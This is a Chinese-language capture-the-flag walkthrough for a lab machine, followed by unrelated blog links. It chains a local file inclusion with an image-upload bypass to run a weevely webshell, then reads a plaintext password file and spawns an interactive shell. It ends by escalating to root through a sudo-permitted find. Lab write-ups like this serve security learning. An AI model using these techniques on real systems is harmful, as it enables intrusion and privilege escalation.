信息收集

主机发现和端口扫描只开放了80的web服务

WEB打点

访问首页有文件上传,肯定可以利用一波。language那个页面甚至文件包含都写脸上了。

root@Lockly tmp/kiractf » curl http://192.168.56.112

<input type="submit" value="upload" onclick="window.location='/upload.php';"/>

<input type="submit" value="language" onclick="window.location='/language.php';"/>

root@Lockly tmp/kiractf » curl http://192.168.56.112/upload.php

<html>

<head>

<title>PHP File type check example</title>

</head>

<body>

<form action="upload.php" enctype="multipart/form-data" method="post">

Select image :

<input type="file" name="file"><br/>

<input type="submit" value="Upload" name="Submit1">

</form>

</body>

</html>#           

root@Lockly ~ » curl http://192.168.56.112/language.php

<!DOCTYPE html>

<html>

<head>

        <title>LFI</title>

</head>

<body>

<input type="submit" value="language"

    onclick="window.location='/language.php?lang=en.php';" />

</form>

</body>

</html>

root@Lockly tmp/kiractf »

抓包看文件上传,这里限制图片文件上传,但是简单的%oo截断,图片前缀等等尝试了一下都不行。

文件包含

在language.php这个页面点击之后跳转en.php,参数都不用fuzz了直接测文件包含。

文件上传

利用文件包含和上传打组合拳,传png上去但通过文件包含解析。修改成png文件上传。

weevely连接成功:

横向

在supersecret-for-aziz中有个密码,应该是属于/home/bassam的。但是提示必须是交互式终端,奇怪的是明明有python环境,但是升级交互式shell会卡住。

www-data@bassam-aziz:/var/www/html $ ls

index.html

language.php

supersecret-for-aziz

upload.php

uploads

www-data@bassam-aziz:/var/www/html $ cat supersecret-for-aziz

cat: supersecret-for-aziz: Is a directory

www-data@bassam-aziz:/var/www/html $ cd supersecret-for-aziz

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz $ ls

bassam-pass.txt

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz $ cat bassam-pass.txt

Password123!@#

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz $ su bassam

su: must be run from a terminal

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz $ whereis python

python: /usr/bin/python3.6 /usr/bin/python3.6m /usr/lib/python3.7 /usr/lib/python3.8 /usr/lib/python2.7 /usr/lib/python3.6 /etc/python2.7 /etc/python3.6 /usr/local/lib/python3.6 /usr/include/python3.6m /usr/share/python

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz $ python -c 'import pty;pty.spawn("/bin/bash")'

sh: 1: python: not found

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz $ python3 -c 'import pty;pty.spawn("/bin/bash")'

id

whoami

换上哥斯拉的也一样,甚至提示语法错误。

反弹到msf尝试居然可以,不清楚是为什么。

提权

切换到bassam之后在这个用户的目录下找到了一个flag。sudo -l 有find可以利用来提权。

www-data@bassam-aziz:/$ su bassam

su bassam

Password: Password123!@#

bassam@bassam-aziz:/$ ls

ls

bin    dev   initrd.img      lib64       mnt   root  snap      sys  var

boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz

cdrom  home  lib             media       proc  sbin  swapfile  usr

bassam@bassam-aziz:/$ cd /home/bassam

cd /home/bassam

bassam@bassam-aziz:~$ ls

ls

Desktop    Downloads         Music     Public     user.txt

Documents  examples.desktop  Pictures  Templates  Videos

bassam@bassam-aziz:~$ cat user.txt

cat user.txt

THM{Bassam-Is-Better_Than-KIRA}

bassam@bassam-aziz:~$ sudo -l

sudo -l

[sudo] password for bassam: Password123!@#

Matching Defaults entries for bassam on bassam-aziz:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on bassam-aziz:

    (ALL : ALL) /usr/bin/find

bassam@bassam-aziz:~$

老地方找payload:

拿下root权限和最后的flag。

随机推荐

  1. 每日一库:lumberjack -- 日志轮换和管理

    在开发应用程序时,记录日志是一项关键的任务,以便在应用程序运行时追踪问题.监视性能和保留审计记录.Go 语言提供了灵活且强大的日志记录功能,可以通过多种方式配置和使用.其中一个常用的日志记录库是 gi ...

  2. Blazor前后端框架Known-V1.2.15

    V1.2.15 更新日期 2023-09-17 更新内容 修复角色不启用相关问题 RadioList组件支持平原(Plain)模式 CheckList组件支持平原(Plain)模式 DataGrid组 ...

  3. 20230919 .NET面经

    SQL IQuerable 和 IEnumerable 的主要区别? https://stackoverflow.com/questions/252785/what-is-the-difference ...

  4. Pisces.IM.Mood 前言

    关于 Pisces.IM.Mood Mood Pisces.IM.Mood 一款基于TCP协议的即时通讯开源系统 多个客户端目前支持以下功能: 支持文字,图片,文件,emoji表情的发送 文件限制为5 ...

  5. 文心一言 VS 讯飞星火 VS chatgpt (99)-- 算法导论9.3 5题

    五.用go语言,假设你已经有了一个最坏情况下是线性时间的用于求解中位数的"黑箱"子程序.设计一个能在线性时间内解决任意顺序统计量的选择问题算法. 文心一言: 为了在线性时间内解决任 ...

  6. 若依框架的startPage( )函数怎么自动关联查询SQL语句?

    Question Description 使用JAVA语言的若依框架的时候,发现只要使用了startPage()函数, 并不需要前端传递分页的数据,也不需要注解,就能完成分页功能.预判他应该是使用类似 ...

  7. [NISACTF 2022]checkin

    题目看上去似乎只是一个简单的get传参,但复制了一下代码,发现不对 这些代码中间还有隐藏的字符 在记事本里面就看到了神奇的字符 就将这些隐藏起来的进行urlencode编码一下 复制这个进行编码,得到 ...

  8. [ABC208E] Digit Products 题解

    Digit Products 题目大意 求有多少个不大于 \(n\) 的正整数,使得该正整数各位乘积不大于 \(k\). 思路分析 观察数据范围,首先考虑数位 DP. 考虑设计记忆化搜索函数 dfs( ...

  9. js性能优化解决办法

    1. 减少http请求次数:CSS Sprites, JS.CSS 源码压缩.图片大小控制合适:网页 Gzip,CDN 托管,data 缓存 ,图片服务器 2. 前端模板 JS + 数据,减少由于HT ...

  10. 打造美团外卖新体验,HarmonyOS SDK持续赋能开发者共赢鸿蒙生态

    从今年8月起,所有升级到HarmonyOS 4的手机用户在美团外卖下单后,可通过屏幕上的一个"小窗口",随时追踪到"出餐.取餐.送达"等订单状态.这个能让用户实 ...